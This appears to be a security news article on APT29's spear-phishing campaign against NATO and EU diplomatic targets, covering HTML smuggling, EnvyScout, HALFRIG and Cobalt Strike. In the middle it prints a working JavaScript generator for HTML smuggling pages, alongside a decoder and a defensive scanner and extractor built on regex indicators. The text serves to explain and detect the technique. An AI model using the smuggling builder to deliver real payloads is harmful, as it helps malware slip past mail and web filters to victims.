Advanced Persistent Threat 29 (APT29), also known as Cozy Bear, has been linked to a widespread campaign targeting NATO and European Union countries.
In a report released on 13 April 2023, Poland’s Military Counterintelligence Service and its Computer Emergency Response Team (CERT.PL) describe an active campaign by the Russian threat actors aimed at harvesting information from diplomatic entities and foreign ministries.
Who are Cozy Bear?

Cozy Bear is the name given to the threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).
In operation since at least 2008, the team of hackers often target government networks in Europe and NATO member countries, research institutes, and think tanks.
In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR. Victims of this campaign included multiple governments, as well as consulting, technology, and telecoms organisations in North America, Europe, Asia, and the Middle East.
Current campaign
In recent months, the threat actors have targeted diplomatic personnel using spear phishing emails impersonating various European countries’ embassies. The emails contain links to malicious websites or attachments designed to deploy malware via ISO, IMG, and ZIP files.
HTML smuggling
In other attacks, victims are lured to websites controlled by APT29, where they are infected with the EnvyScout dropper via a technique known as HTML smuggling.
HTML smuggling hides the malicious payload inside an otherwise benign HTML file: the file’s bytes are embedded in the page, typically Base64-encoded and XOR-masked, and a short piece of JavaScript decodes them in the browser, wraps them in a Blob and triggers a download. Because the file is only assembled on the victim’s machine, a web filter or email gateway inspecting the traffic sees an ordinary HTML document with inline script and lets it through, together with the malicious payload it carries.
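The following is an added example, not code from the CERT.PL report or from APT29’s own tooling. It shows the mechanism from both sides: how a smuggling page rebuilds a file in the browser, and a static check a gateway could apply to HTML it would otherwise pass. The payload is a constructed, harmless string; the XOR key, file name and indicator patterns are illustrative assumptions.

```javascript
// Added example, not code from the CERT.PL report or from APT29 tooling.
// Attacker side builds the page, victim side decodes it, defender side scans
// and extracts. Payload, key, file name and indicator list are constructed
// illustrative assumptions.

const XOR_KEY = 0x5a;                       // assumed single-byte mask
const SAMPLE_FILE = Buffer.from(            // constructed stand-in for an ISO/ZIP
  'PK\u0003\u0004 constructed harmless archive stub for the smuggling example');

// Attacker side: mask the file bytes and embed them in an otherwise benign page.
function encodePayload(bytes, key) {
  const masked = Uint8Array.from(bytes, (b) => b ^ key);
  return Buffer.from(masked).toString('base64');
}

function buildSmugglingPage(fileBytes, key, filename) {
  const b64 = encodePayload(fileBytes, key);
  // The inline script is what runs on the victim's machine: decode, unmask,
  // wrap in a Blob and force a download through an anchor element.
  return `<!DOCTYPE html><html><body>
<p>Loading document, please wait...</p>
<script>
  var key = ${key};
  var bin = atob("${b64}");
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i) ^ key;
  var blob = new Blob([bytes], { type: "application/octet-stream" });
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "${filename}";
  a.click();
</script>
</body></html>`;
}

// Victim side, as a callable function: the same reconstruction the inline
// script performs (atob is a browser global; Node 16+ provides it too).
function decodePayload(b64, key) {
  const bin = atob(b64);
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i) ^ key;
  return out;
}

// Defender side: flag HTML that carries the building blocks of smuggling.
// Several hits together are far more telling than any one alone.
const INDICATORS = [
  { name: 'blob-construction',    re: /new\s+Blob\s*\(/ },
  { name: 'object-url',           re: /URL\.createObjectURL\s*\(/ },
  { name: 'forced-download',      re: /\.download\s*=|msSaveOrOpenBlob/ },
  { name: 'base64-decode',        re: /\batob\s*\(/ },
  { name: 'large-base64-literal', re: /["'][A-Za-z0-9+\/]{64,}={0,2}["']/ },
];

function scanHtmlForSmuggling(html) {
  return INDICATORS.filter((ind) => ind.re.test(html)).map((ind) => ind.name);
}

// Defender side: pull the embedded file back out so it can be hashed or
// detonated without opening the page (assumes the atob("...")/key pattern above).
function extractSmuggledPayload(html) {
  const b64 = html.match(/atob\s*\(\s*["']([A-Za-z0-9+\/=]+)["']\s*\)/);
  const key = html.match(/\bkey\s*=\s*(\d+)/);
  if (!b64 || !key) return null;
  return decodePayload(b64[1], Number(key[1]));
}
```

The indicator list is deliberately coarse: legitimate web apps also use Blob and createObjectURL, so a gateway would treat a combination of these hits, plus a large opaque literal and a forced download, as grounds to extract and sandbox the payload rather than block on any single pattern.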
In some cases, victims targeted with HTML smuggling were subsequently compromised further by file downloaders designed to deliver additional malware, and by HALFRIG, a Cobalt Strike Beacon stager.
Analysis of affected devices has shown that the downloaders were used for reconnaissance, helping the attackers evaluate each target’s relevance and determine whether it was a honeypot or a virtual machine used for malware analysis.
If the infected device passed this verification stage, the downloaders were used to deliver and launch Cobalt Strike or Brute Ratel.
Cobalt Strike
Cobalt Strike is a widely known suite of customizable penetration testing tools.
First released in 2012, it was originally the commercial spin-off of the open-source Armitage project, which added a graphical user interface (GUI) to the Metasploit framework so that security practitioners could exploit vulnerable hosts and manage sessions more quickly.
The software has also become a favorite tool of cybercriminals as an easy and cost-effective way to remotely access and manage infected systems.

The official vendor of Cobalt Strike is Fortra (formerly HelpSystems), which vets prospective buyers in an attempt to keep the software out of the hands of those who would use it for malicious purposes.

Cobalt Strike has been leaked and cracked multiple times over the years, and illicit copies are sold on the dark web for many thousands of dollars.
These unauthorised versions are just as powerful as the legitimate retail releases; the difference is that they lack an active licence, so they cannot receive vendor updates as easily.
